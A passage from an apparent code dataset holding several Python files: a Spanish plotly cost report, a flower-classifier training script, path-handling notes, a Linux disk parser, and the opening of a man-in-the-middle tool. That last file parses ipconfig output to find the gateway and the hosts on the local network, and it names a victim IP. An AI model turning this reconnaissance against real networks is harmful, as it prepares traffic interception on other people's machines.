orden_mes, total_abierto)\n\n # Gráfica por cantidad \n gb_f11_gm_cant = self.f11_rf.groupby([var_f11['grupo'], var_f11['mes']], sort=False)[var_f11['f11_id']].nunique().reset_index() # TODO repetido\n gb_f11_gm_cant = set_columns_nunique(gb_f11_gm_cant, var_f11['mes'],var_f11['f11_id'])\n gb_f11_gm_cant = set_columns_nunique(gb_f11_gm_cant, var_f11['grupo'],var_f11['f11_id'])\n orden_grupo_cant = gb_f11_gm_cant.groupby([var_f11['grupo']], sort=False)[var_f11['f11_id']].sum().sort_values(ascending=False).reset_index()[var_f11['grupo']].to_list()\n orden_mes_cant = gb_f11_gm_cant[var_f11['mes']].unique().tolist()\n total_abierto_cant = gb_f11_gm_cant[var_f11['f11_id']].sum()\n gb_f11_3m_cant_grupo = self.f11_m90.groupby(var_f11['grupo'])[var_f11['f11_id']].nunique().reset_index().set_index(var_f11['grupo']) # Calcula los totales de costo por grupo \n self.fig_f11_cantidad(gb_f11_gm_cant, gb_f11_3m_cant_grupo, orden_grupo_cant, orden_mes_cant, total_abierto_cant)\n \n #Generación tablas\n f11_initial = fltr_fecha_desde(self.f11)\n f11_abiertos = fltr_abiertos(f11_initial)\n f11_empresa = fltr_empresa(f11_abiertos)\n f11_cliente = fltr_cliente(f11_abiertos)\n f11_emp_cd = f11_empresa.loc[f11_empresa[var_f11['grupo']] == 'CD']\n f11_emp_no_cd = f11_empresa.loc[~f11_empresa[var_f11['grupo']].isin(['CD', 'BODEGA PRODUCTO EN PROCESO'])]\n f11_cl_cd = f11_cliente.loc[f11_cliente[var_f11['grupo']] == 'CD']\n f11_cl_no_cd = f11_cliente.loc[~f11_cliente[var_f11['grupo']].isin(['CD', 'BODEGA PRODUCTO EN PROCESO'])]\n self.generate_tables(f11_empresa,f11_cliente,f11_emp_cd,f11_emp_no_cd,f11_cl_no_cd,f11_cl_cd)\n\n def fig_f11_costo(self, df, gb_annotations, orden_grupo, orden_mes, ta):\n f11_empresa_sede = px.bar(df, x=var_f11['mes'], y=var_f11['costo'], color=var_f11['grupo'], text=var_f11['costo'], text_auto='.2s', category_orders={var_f11['grupo']:orden_grupo, var_f11['mes']:orden_mes})\n f11_empresa_sede.update_layout(barmode='stack',title_text=f\"F11s empresa abiertos por sede - Total abierto {ta/1e6:,.0f}M\") #,uniformtext=dict(mode=\"hide\", minsize=10),legend=dict(yanchor=\"top\", y=0.95, xanchor=\"left\", x=0.1))\n f11_empresa_sede.update_layout(legend=dict(orientation=\"h\", yanchor=\"top\", y=-0.2, xanchor=\"right\", x=0.5))\n f11_empresa_sede.update_layout(font=dict(size=14))\n\n # f11_empresa_sede.add_shape(type=\"rect\",xref=\"paper\", yref=\"paper\",x0=0, y0=0,x1=0.62, y1=1,line=dict(color=\"red\", width=2,))\n print(f'{orden_mes[0]}-----------------------------')\n mes_ref = orden_mes[0] \n f11_empresa_sede.add_annotation(x=mes_ref, y=0.9*1e9, text= f\"Total > 90 días = {gb_annotations.sum()[0]/1e6:,.0f}M\", showarrow=False, font = dict (color = \"red\",size = 17), xanchor='left') # TODO Estas líneas pueden agrupar, en un solo add_annotation, utilizando <br>, y se alinea mejor utilizando fig.update_annotations(align=\"left\") \n f11_empresa_sede.add_annotation(x=mes_ref, y=0.8*1e9, text= f\"CD = {gb_annotations.loc['CD'][0]/1e6:,.0f}M\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n f11_empresa_sede.add_annotation(x=mes_ref, y=0.7*1e9, text= f\"TIENDAS = {gb_annotations.loc['TIENDAS'][0]/1e6:,.0f}M\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n f11_empresa_sede.add_annotation(x=mes_ref, y=0.6*1e9, text= f\"BODEGA PRODUCTO EN PROCESO = {gb_annotations.loc['BODEGA PRODUCTO EN PROCESO'][0]/1e6:,.0f}M\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n # f11_empresa_sede.add_annotation(x=mes_ref, y=0.5*1e9, text= f\"DVD ADMINISTRATIVO = {gb_annotations.loc['DVD ADMINISTRATIVO'][0]/1e6:,.0f}M\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n\n f11_empresa_sede.layout.yaxis.title.text='Total costo promedio'\n f11_empresa_sede.layout.xaxis.title.text='Mes de creación'\n f11_empresa_sede.write_image(f\"{self.path}/{self.fcorte}_f11_empresa_abiertos_sede_monto.png\",scale=1, height=800,width=850, engine='orca')\n \n def fig_f11_cantidad(self, df, gb_annotations, orden_grupo, orden_mes, ta):\n f11_es_cantidad = px.bar(df, x=var_f11['mes'], y=var_f11['f11_id'], color=var_f11['grupo'], text=var_f11['f11_id'], text_auto='.0f', category_orders={var_f11['grupo']:orden_grupo, var_f11['mes']:orden_mes})\n f11_es_cantidad.update_layout(barmode='stack',title_text=f\"F11s empresa abiertos por sede - Total abierto {ta:,.0f} folios de F11\" ) #,uniformtext=dict(mode=\"hide\", minsize=10),legend=dict(yanchor=\"top\", y=0.95, xanchor=\"left\", x=0.1))\n f11_es_cantidad.update_layout(legend=dict(orientation=\"h\", yanchor=\"top\", y=-0.2, xanchor=\"right\", x=0.5))\n f11_es_cantidad.update_layout(font=dict(size=14))\n\n # f11_es_cantidad.add_shape(type=\"rect\",xref=\"paper\", yref=\"paper\",x0=0, y0=0,x1=0.62, y1=1,line=dict(color=\"red\", width=2,))\n mes_ref = orden_mes[0]\n f11_es_cantidad.add_annotation(x=mes_ref, y=1200, text= f\"Total > 90 días = {gb_annotations.sum()[0]:,.0f} folios\", showarrow=False, font = dict (color = \"red\",size = 17), xanchor='left') # TODO igual que en la lina 88\n f11_es_cantidad.add_annotation(x=mes_ref, y=1000,text= f\"CD = {gb_annotations.loc['CD'][0]:,.0f} folios\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n f11_es_cantidad.add_annotation(x=mes_ref, y=900,text= f\"TIENDAS = {gb_annotations.loc['TIENDAS'][0]:,.0f} folios\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n f11_es_cantidad.add_annotation(x=mes_ref, y=800,text= f\"BODEGA PRODUCTO EN PROCESO = {gb_annotations.loc['BODEGA PRODUCTO EN PROCESO'][0]:,.0f} folios\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n # f11_es_cantidad.add_annotation(x=mes_ref, y=700,text= f\"DVD ADMINISTRATIVO = {gb_annotations.loc['DVD ADMINISTRATIVO'][0]:,.0f} folios\",showarrow=False,font = dict (color = \"red\",size = 14), xanchor='left')\n\n f11_es_cantidad.layout.yaxis.title.text='Cantidad de folios de F11'\n f11_es_cantidad.layout.xaxis.title.text='Mes de creación'\n f11_es_cantidad.write_image(F\"{self.path}/{self.fcorte}_f11_empresa_abiertos_sede_cantidad.png\",scale=1, height=800,width=850, engine='orca')\n\n def generate_tables(self,f11_empresa,f11_cliente,f11_emp_cd,f11_emp_no_cd,f11_cl_no_cd,f11_cl_cd):\n tb_emp_gen = make_tables(f11_empresa,'SERVICIO','GRUPO',var_f11['costo'])\n tb_cl_gen = make_tables(f11_cliente,'SERVICIO','GRUPO',var_f11['costo'])\n tb_emp_gen_ant = make_tables(f11_empresa,'SERVICIO','age',var_f11['costo'], 'f11','f11_ant')\n tb_cl_gen_ant = make_tables(f11_cliente,'SERVICIO','age',var_f11['costo'],'f11_cl', 'f11_ant')\n tb_emp_cd = make_tables(f11_emp_cd,'SERVICIO','age',var_f11['costo'],'f11','f11_ant')\n tb_emp_no_cd = make_tables(f11_emp_no_cd.sort_values('DIAS',ascending=True),'SERVICIO','age',var_f11['costo'],'f11','f11_ant')\n tb_cl_no_cd = make_tables(f11_cl_no_cd.sort_values('DIAS',ascending=True),'SERVICIO','age',var_f11['costo'],'f11_cl','f11_ant')\n tb_cl_cd = make_tables(f11_cl_cd.sort_values('DIAS',ascending=True),'SERVICIO','age',var_f11['costo'],'f11_cl','f11_ant')\n\n tb_emp_gen.write_image(f'{self.path}/{self.fcorte}tb_emp_gral.png',height = 500, width = 1500, engine='orca')\n tb_cl_gen.write_image(f'{self.path}/{self.fcorte}tb_cl_gral.png',height = 500, width = 1500, engine='orca')\n tb_emp_cd.write_image(f'{self.path}/{self.fcorte}tb_emp_cd.png',height = 500, width = 1500, engine='orca')\n tb_emp_no_cd.write_image(f'{self.path}/{self.fcorte}tb_emp_no_cd.png',height = 500, width = 1500, engine='orca')\n tb_cl_no_cd.write_image(f'{self.path}/{self.fcorte}tb_cl_no_cd.png',height = 500, width = 1500, engine='orca')\n tb_cl_cd.write_image(f'{self.path}/{self.fcorte}tb_cl_cd.png',height = 500, width = 1500, engine='orca')\n tb_emp_gen_ant.write_image(f'{self.path}/{self.fcorte}tb_emp_ant.png',height = 500, width = 1500, engine='orca')\n tb_cl_gen_ant.write_image(f'{self.path}/{self.fcorte}tb_cl_ant.png',height = 500, width = 1500, engine='orca')\n\n # ---------------- Trend methods \n def get_tendencias_costo(self):\n # Total flujo \n tcd = self.f11_tcosto.loc[self.f11_tcosto[var_f11['grupo']]=='CD']\n ttienda = self.f11_tcosto.loc[(self.f11_tcosto[var_f11['grupo']]=='TIENDAS')|(self.f11_tcosto[var_f11['grupo']]=='DVD ADMINISTRATIVO')]\n\n gb_tcd = tcd.groupby([var_f11['fecha_corte']])[var_f11['costo']].sum().reset_index()\n gb_ttienda = ttienda.groupby([var_f11['fecha_corte']])[var_f11['costo']].sum().reset_index()\n\n self.fig_f11_trend_costo(gb_tcd, 'CD', ['rgb(204, 97, 176)'])\n self.fig_f11_trend_costo(gb_ttienda, 'Tiendas & DVD', ['rgb(36, 121, 108)'])\n\n # Mayores a 90 días \n tm90_cd = self.f11_tm90_costo.loc[self.f11_tm90_costo[var_f11['grupo']]=='CD']\n tm90_tienda = self.f11_tm90_costo.loc[(self.f11_tm90_costo[var_f11['grupo']]=='TIENDAS')|(self.f11_tm90_costo[var_f11['grupo']]=='DVD ADMINISTRATIVO')]\n\n gb_tm90_cd = tm90_cd.groupby([var_f11['fecha_corte']])[var_f11['costo']].sum().reset_index()\n gb_tm90_tienda = tm90_tienda.groupby([var_f11['fecha_corte']])[var_f11['costo']].sum().reset_index()\n\n self.fig_f11_trend_costo(gb_tm90_cd, 'CD mayores a 90 días', ['rgb(204, 97, 176)'])\n self.fig_f11_trend_costo(gb_tm90_tienda, 'Tiendas & DVD mayores a 90 días', ['rgb(36, 121, 108)'])\n\n def fig_f11_trend_costo(self, df, local, color):\n df[var_f11['costo']] = round(df[var_f11['costo']]/1e6)\n fig_f11_cd_trend = px.line(df, x=var_f11['fecha_corte'], y=var_f11['costo'], labels={var_f11['fecha_corte']:'Fecha de corte', \n var_f11['costo']: \"Costo total (Millones)\" }, text=var_f11['costo'], color_discrete_sequence=color, \n title=f\"F11 abiertos {local}\" )\n fig_f11_cd_trend.update_layout(legend=dict(yanchor=\"top\", y=1, xanchor=\"left\", x=0.45))\n fig_f11_cd_trend.update_traces(textposition=\"bottom right\")\n fig_f11_cd_trend.update_xaxes(range=self.rango_fechas, constrain=\"domain\")\n fig_f11_cd_trend.update_layout(font=dict(size=14))\n # nuevos \n fig_f11_cd_trend.update_layout(margin_r=20, margin_t=60)\n fig_f11_cd_trend.write_image(f\"{self.path}/{self.fcorte}_f11_trend_{local}.png\",width=550, height=400, engine='orca')\n\n def get_tendencias_cantidad(self):\n # Cantidad \n self.f11_tcant = transform_df_trend(self.f11_tcant, var_f11['f11_id'])\n \n tcd = self.f11_tcant.loc[self.f11_tcant[var_f11['grupo']]=='CD']\n ttienda = self.f11_tcant.loc[(self.f11_tcant[var_f11['grupo']]=='TIENDAS')|(self.f11_tcant[var_f11['grupo']]=='DVD ADMINISTRATIVO')]\n\n gb_tcd = tcd.groupby([var_f11['fecha_corte']])[var_f11['f11_id']].sum().reset_index()\n gb_ttienda = ttienda.groupby([var_f11['fecha_corte']])[var_f11['f11_id']].sum().reset_index()\n\n self.fig_f11_trend_cantidad(gb_tcd, 'CD', ['rgb(204, 97, 176)'])\n self.fig_f11_trend_cantidad(gb_ttienda, 'Tiendas & DVD', ['rgb(36, 121, 108)'])\n\n # Cantidad 90 días \n self.f11_tm90_cant = transform_df_trend(self.f11_tm90_cant, var_f11['f11_id'])\n\n tm90_cd = self.f11_tm90_cant.loc[self.f11_tm90_cant[var_f11['grupo']]=='CD']\n tm90_tienda = self.f11_tm90_cant.loc[(self.f11_tm90_cant[var_f11['grupo']]=='TIENDAS')|(self.f11_tm90_cant[var_f11['grupo']]=='DVD ADMINISTRATIVO')]\n\n gb_tm90_cd = tm90_cd.groupby([var_f11['fecha_corte']])[var_f11['f11_id']].sum().reset_index()\n gb_tm90_tienda = tm90_tienda.groupby([var_f11['fecha_corte']])[var_f11['f11_id']].sum().reset_index()\n\n self.fig_f11_trend_cantidad(gb_tm90_cd, 'CD mayores a 90 días', ['rgb(204, 97, 176)'])\n self.fig_f11_trend_cantidad(gb_tm90_tienda, 'Tiendas & DVD mayores a 90 días', ['rgb(36, 121, 108)'])\n\n def fig_f11_trend_cantidad(self, df, local, color):\n fig_f11_cd_trend = px.line(df, x=var_f11['fecha_corte'], y=var_f11['f11_id'], labels={var_f11['fecha_corte']:'Fecha de corte', \n var_f11['f11_id']: \"Cantidad de folios F11\" }, text=var_f11['f11_id'], color_discrete_sequence=color, \n title=f\"F11 abiertos {local}\" )\n fig_f11_cd_trend.update_layout(legend=dict(yanchor=\"top\", y=1, xanchor=\"left\", x=0.45))\n fig_f11_cd_trend.update_traces(textposition=\"bottom right\")\n fig_f11_cd_trend.update_xaxes(range=self.rango_fechas, constrain=\"domain\")\n fig_f11_cd_trend.update_layout(margin_r=20, margin_t=60)\n fig_f11_cd_trend.update_layout(font=dict(size=14))\n fig_f11_cd_trend.write_image(f\"{self.path}/{self.fcorte}_f11_tcant_{local}.png\",width=550, height=400, engine='orca')\n\n# General methods \n\ndef fltr_tipo_f11(df):\n return df.loc[df[var_f11['servicio']].isin(var_f11['tipo_f11_x_grafica'])]\n\ndef fltr_empresa(df):\n return df.loc[df[var_f11['propietario']] == var_f11['prop_empresa']].reset_index(drop=True)\n\ndef fltr_cliente(df):\n return df.loc[df[var_f11['propietario']] == var_f11['prop_cliente']].reset_index(drop=True)\n\ndef fltr_abiertos(df):\n return df.loc[df[var_f11['estado']].isin(var_f11['estados_abiertos'])].reset_index(drop=True)\n \ndef fltr_fecha_desde(df):\n return df.loc[df[var_f11['fech_creacion']] >= var_f11['fecha_inicial']].reset_index(drop=True)\n\ndef transform_df_trend(df, value):\n df[value] = pd.to_numeric(df[value])\n df[var_f11['fecha_corte']] = pd.to_datetime(df[var_f11['fecha_corte']], format='%Y-%m-%d')\n return df \n\ndef set_fecha_corte(df, fecha_corte=datetime.now().strftime(\"%Y-%m-%d\")):\n df['FECHA_CORTE']= fecha_corte\n return df\n","repo_name":"maperezrf/Slides_f","sub_path":"f11.py","file_name":"f11.py","file_ext":"py","file_size_in_byte":20402,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33665412844","text":"#coding=UTF-8\nimport os\nimport random\nfrom torchvision import models\nimport numpy as np\nimport time\nimport copy\nimport torch\nimport input_data\nfrom torch import nn, optim\nfrom torch.optim import lr_scheduler\n\n# ---------------------------------------------------------------------------\n# hyperparameters\ntrain_dir = './flower_photos'\nratio = 0.3\nSIZE = 224\nEPOCHS = 30\nseed = 1\n# ---------------------------------------------------------------------------\n\n# ---------------------------------------------------------------------------\nrandom.seed(seed) \nnp.random.seed(seed) \ntorch.manual_seed(seed)\ntorch.cuda.manual_seed_all(seed)\ntorch.backends.cudnn.deterministic = True \ntorch.backends.cudnn.benchmark = True\n# ---------------------------------------------------------------------------\n\n# ---------------------------------------------------------------------------\n# GPU\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n# ---------------------------------------------------------------------------\n\n\nmodel = models.densenet169(pretrained=True)\n\n# for param in model.parameters():\n# param.requires_grad_(False)\n\nclassifier = nn.Sequential(\n nn.Linear(1664, 5),\n nn.LogSoftmax(dim=1)\n)\nmodel.classifier = classifier\n\nprint(model)\n\n\ndataloaders, dataset_sizes = input_data.get_files(train_dir, ratio, SIZE)\n\n\ndef train_model(model, criteria, optimizer, scheduler, num_epochs, device='cuda'):\n \"\"\"\n Train the model\n :param model:\n :param criteria:\n :param optimizer:\n :param scheduler:\n :param num_epochs:\n :param device:\n :return:\n \"\"\"\n model.to(device)\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n\n for phase in ['train', 'valid']:\n if phase == 'train':\n scheduler.step()\n model.train()\n else:\n model.eval()\n\n running_loss = 0.0\n running_corrects = 0\n\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criteria(outputs, labels)\n\n if phase == 'train':\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(\n phase, epoch_loss, epoch_acc))\n\n if phase == 'valid' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n print()\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best val Acc: {:4f}'.format(best_acc))\n\n model.load_state_dict(best_model_wts)\n# ------------------------------------------------------------------\n\ncriteria = nn.NLLLoss()\noptimizer = optim.Adam(model.classifier.parameters(), lr=0.001) # 1\nsched = lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.1) # 4\ntrain_model(model, criteria, optimizer, sched, EPOCHS, device)\nmodel_file_name = 'flower_classifier_densenet169_1024.pth'\ntorch.save({'arch': 'densenet169',\n 'state_dict': model.state_dict()},\n model_file_name)","repo_name":"yikomoa/Flowers-Classifier","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24162350220","text":"#!/usr/bin/env python\n\n# TL;dr it's this nonsense:\n# expandvars will expand $HOME (and any/all other vars)\n# expanduser will expand ~/ and ~username\nos.path.expandvars(os.path.expanduser(\"$HOME/pants\"))\nos.path.expandvars(os.path.expanduser(\"~/pants\"))\nos.path.expandvars(os.path.expanduser(\"~david.brady/pants\"))\n\n# Ruby:\n# dirname = File.dirname(__FILE__)\n# filename = File.join(dirname, 'relative/path/to/file')\n# abspath = File.expand_path(filename) # also expands ~ into e.g. /home/you or /Users/you\n\n# Python:\nimport os\ndirname = os.path.dirname(__file__)\nfilename = os.path.join(dirname, 'relative/path/to/file') # poor, won't work on Windows because \\\\ != /\nfilename = os.path.join(dirname, 'relative', 'path', 'to', 'file') # better\nabspath = os.path.abspath(filename)\n\nprint(\"Here, learn you a good python:\")\nprint(f\"__file__: {__file__}\")\nprint(f\"dirname: {dirname}\")\nprint(f\"filename: {filename}\")\nprint(f\"abspath: {abspath}\")\n\n# note that abspath returns a relative path (wat).\n\n# os.path.expandvars will expand $HOME but not ~, lol/sigh.\n\n# os.path.join takes a variable arg list, which should be favored over\n# a string containing linux path separators, which might not work on\n# Windows. Another nod to Python's mindset of \"your code should\n# support your user's environments\" over Ruby's \"your users must\n# support your code's requirements\". I'm thrilled to see virtualenv\n# and pip -r requirements.txt and such, but it sometimes feels like\n# people out there are favoring \"your code should spoonfeed the\n# runtime\" over \"the runtime must support your code\".\n\n# Blog this, maybe? Python recognized this problem was very hard to\n# solve and pushed it onto code authors to minimize their\n# dependencies, leaving the darker corners of the unsolvable problem\n# unaddressed beyond the occasional lament. Ruby declared this problem\n# unsolvable and threw it onto the community. It was a complete\n# nightmare, orders of magnitude worse than \"DLL Hell\". And then the\n# ruby community said \"wow this sucks, and running on an arbitrary\n# environment is an impossible problem, but fixing the environment is\n# a problem that is merely very difficult.\" So they invented\n# rvm/chruby/rbenv, and then bundler. Because Ruby places no value on\n# spoonfeeding your runtime, they place very high value on making it\n# trivial to declare, identify, and satisfy requirements. A decade\n# later, all the other langs out there are getting on board with\n# virtual envs and the ones that aren't get stuffed into a docker\n# container.\n","repo_name":"dbrady/scrapbin","sub_path":"python/require_relative.py","file_name":"require_relative.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"7032443612","text":"import subprocess\nimport os\nimport re\nfrom typing import Tuple\nfrom system import (\n System,\n Partition,\n PhysicalDisk,\n LogicalDisk,\n SystemComponent,\n DummyPartition\n)\nfrom exceptions import PyDiskInfoParseError\n\n\nclass LinuxSystem(System):\n \"\"\"This is the linux version of the System class.\n\n This class will take care of the special cases for when the module is\n running on linux systems. The availability of certain files and tools\n differ between linux distros and versions. Some info may be available\n as a regular user under some circumstances. But to get the module to\n find all variables, you will probably have to run in with raised\n privileges.\n\n \"\"\"\n\n def __init__(self, name: str = None) -> None:\n super().__init__(name)\n self._set_version()\n self['Type'] = 'Linux'\n\n def _set_version(self):\n \"\"\"The distribution version of the system.\n\n There is no 'one' way to get version information about a linux distro.\n Kernel version would be easier, but is not really of any interest in\n the scope of the pydiskinfo module. So we do as best we can, and\n default to kernel version if all else fails.\"\"\"\n self['Version'] = f'{os.uname()[0]} {os.uname()[2]}'\n\n def _get_block_devices(self) -> Tuple[Tuple[str]]:\n block_devices = []\n try:\n with open('/proc/partitions', 'r') as proc_partitions:\n for each_line in proc_partitions:\n match = re.match(\n r'\\s*(\\d+)\\s+(\\d+)\\s+(\\d+)\\s+(\\S+)\\s*',\n each_line\n )\n if match:\n block_devices.append(match.group(1, 2, 3, 4))\n except FileNotFoundError as err:\n raise PyDiskInfoParseError(\n 'Missing /proc/partitions. Giving up parsing.'\n ) from err\n return tuple(block_devices)\n\n def _get_scsi_hard_drives(\n self,\n block_devices\n ) -> Tuple['LinuxPhysicalDisk']:\n linux_physical_disks = []\n for each_device in block_devices:\n if each_device[0] == '8' and (int(each_device[1]) % 16) == 0:\n linux_physical_disks.append(\n LinuxPhysicalDisk(\n self,\n int(each_device[0]),\n int(each_device[1]),\n int(each_device[2]),\n each_device[3]\n )\n )\n self._set_media_type(linux_physical_disks, 'SATA/SCSI HD')\n return tuple(linux_physical_disks)\n\n def _set_media_type(\n self,\n physical_disks: Tuple['LinuxPhysicalDisk'],\n meida_type: str\n ) -> None:\n for each_disk in physical_disks:\n each_disk.set_media_type(meida_type)\n\n def _get_partitions_from_block_devices(\n self,\n block_devices: Tuple[Tuple[str]],\n physical_disks: list['LinuxPhysicalDisk']\n ) -> Tuple['LinuxPartition']:\n partitions = []\n for each_device in block_devices:\n if int(each_device[1]) % 16 > 0:\n disk = None\n for each_disk in physical_disks:\n if str(\n each_disk._major_number\n ) == each_device[0] and each_disk._minor_number < int(\n each_device[1]\n ) and each_disk._minor_number + 16 > int(each_device[1]):\n disk = each_disk\n break\n partition = LinuxPartition(\n disk,\n int(each_device[0]),\n int(each_device[1]),\n int(each_device[2]),\n each_device[3]\n )\n if disk:\n disk.add_partition(partition)\n partitions.append(partition)\n return tuple(partitions)\n\n def _parse_system(self) -> None:\n block_devices = self._get_block_devices()\n self._physical_disks.extend(self._get_scsi_hard_drives(block_devices))\n # for each_device in block_devices:\n # # handeling metadisk (raid) devices\n # if each_device[0] == '9':\n # # read from /proc/mdstat\n # self._physical_disks.append(\n # LinuxPhysicalDisk(\n # self,\n # int(each_device[0]),\n # int(each_device[1]),\n # int(each_device[2]),\n # each_device[3]\n # )\n # )\n self._partitions.extend(\n self._get_partitions_from_block_devices(\n block_devices,\n self._physical_disks\n )\n )\n logical_disks = []\n try:\n mounts = subprocess.run(\n (\n 'df',\n '--output=source,fstype,size,avail,target',\n '--local',\n '--block-size=1'\n ),\n capture_output=True,\n text=True\n )\n for each_line in mounts.stdout.split('\\n'):\n match = re.search(\n r'(.*\\w)\\s+(\\w+)\\s+(\\d+)\\s+(\\d+)\\s+(\\/.*)',\n each_line\n )\n if match:\n logical_disks.append(match.groups())\n except OSError as err:\n raise PyDiskInfoParseError('Cant find the \"df\" command.') from err\n for each_logical_disk in logical_disks:\n logical_disk = LinuxLogicalDisk(\n self,\n each_logical_disk[4],\n each_logical_disk[1],\n int(each_logical_disk[2]),\n int(each_logical_disk[3])\n )\n for each_partition in self._partitions:\n if each_partition['Path'] == each_logical_disk[0]:\n checked_logical_disk = self._add_logical_disk(logical_disk)\n each_partition.add_logical_disk(checked_logical_disk)\n checked_logical_disk.add_partition(each_partition)\n for each_disk in self._physical_disks:\n if each_disk['Path'] == each_logical_disk[0]:\n checked_logical_disk = self._add_logical_disk(logical_disk)\n dummy_partition = DummyPartition(\n each_disk,\n checked_logical_disk\n )\n self._partitions.append(dummy_partition)\n each_disk.add_partition(dummy_partition)\n checked_logical_disk.add_partition(dummy_partition)\n\n def _add_logical_disk(self, logical_disk: 'LogicalDisk') -> 'LogicalDisk':\n return_logical_disk = None\n for each_logical_disk in self._logical_disks:\n if each_logical_disk['Name'] == logical_disk['Name']:\n return_logical_disk = each_logical_disk\n break\n if not return_logical_disk:\n return_logical_disk = logical_disk\n self._logical_disks.append(logical_disk)\n return return_logical_disk\n\n\nclass LinuxPhysicalDisk(PhysicalDisk):\n def __init__(\n self,\n system: SystemComponent,\n major_number: int,\n minor_number: int,\n size_in_sectors: int,\n device_name: str\n ) -> None:\n super().__init__(system)\n self._major_number = major_number\n self._minor_number = minor_number\n self._set_name_and_path(device_name)\n self._set_size_and_sectors(size_in_sectors)\n\n def _set_size_and_sectors(\n self,\n sectors: int,\n sector_size: int = 512\n ) -> None:\n \"\"\"Sets number of sectors, sectors size, and size in bytes.\"\"\"\n self['Sectors'] = sectors\n self['Bytes per Sector'] = sector_size\n self['Size'] = sectors * sector_size\n\n def _set_name_and_path(self, name):\n self['Name'] = name\n self['Path'] = f'/dev/{name}'\n\n def set_media_type(self, media_type: str) -> None:\n self['Media'] = media_type\n\n\nclass LinuxPartition(Partition):\n def __init__(\n self,\n disk: 'PhysicalDisk',\n major_number: int,\n minor_number: int,\n size_in_sectors: int,\n device_name: str\n ) -> None:\n super().__init__(disk)\n self._major_number = major_number\n self._minor_number = minor_number\n self._set_device_id_and_path(device_name)\n self._set_blocks_and_size(size_in_sectors)\n\n def _set_blocks_and_size(\n self,\n sectors: int,\n sector_size: int = 512\n ) -> None:\n self['Number of Blocks'] = sectors\n self['Size'] = sectors * sector_size\n self['Blocksize']\n\n def _set_device_id_and_path(self, name: str) -> None:\n self['Device I.D.'] = name\n self['Path'] = f'/dev/{name}'\n\n\nclass LinuxLogicalDisk(LogicalDisk):\n def __init__(\n self,\n system: object,\n path: str,\n file_system: str,\n size: int,\n free_space: int\n ) -> None:\n super().__init__(system)\n self._set_path_device_id_and_name(path)\n self['Filesystem'] = file_system\n self['Size'] = size\n self['Free Space'] = free_space\n\n def _set_path_device_id_and_name(self, path):\n self['Path'] = path\n self['Device I.D.'] = path\n self['Name'] = path\n","repo_name":"glarrrgh/pydiskinfo","sub_path":"linux_system.py","file_name":"linux_system.py","file_ext":"py","file_size_in_byte":9529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32262623415","text":"from tkinter import *\nfrom tkinter import ttk\nfrom typing import Tuple\n\nfrom PIL import ImageTk, Image\nfrom encrypting.users import Users\nimport subprocess\nimport re\nfrom mitm.final_run import FinalRun\n\nCMDIP_REGEX = \"\\s((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\\s\"\nSUBNET_REG = \"Subnet\\sMask\\s[\\.|\\s]+:\\s((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\"\nGATEWAY_REG = \"Default\\sGateway\\s[\\.|\\s]+:\\s((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\"\nGATEWAYIP = ''\nIP_LIST = []\nVICTIM_IP = ''\n\ndef find_mask():\n \"\"\"\n gets the ipconfig command info from the cmd, and uses re to find the ip numbers which matches the 255 areas in the\n sbnet mask\n :return: gateway ip, ip subnet mask\n \"\"\"\n text = str(subprocess.check_output(\"cmd /c ipconfig\", stderr=subprocess.STDOUT, shell=True))\n subnet_mask = re.search(SUBNET_REG, text).group(1)\n gateway = re.search(GATEWAY_REG, text).group(1)\n subsplit = subnet_mask.split(\".\")\n gatesplit = gateway.split(\".\")\n check_ip = []\n for i in range(0,4):\n if subsplit[i] == \"255\":\n check_ip.append(gatesplit[i])\n return check_ip, gateway\n\ndef clean_ip_list(ips, mask):\n \"\"\"\n :param ips: the list on current avalable ip addresses in the network\n :param mask: the subnet mask\n :return: a list of ips which matches the subnet mask, without the ip of the attacking machine\n \"\"\"\n final_list = []\n for ip in ips:\n x = ip.split(\".\")\n flag = True\n for i in range(0,len(mask)):\n if x[i] != mask[i]:\n flag = False\n if flag:\n final_list.append(\".\".join(x))\n del 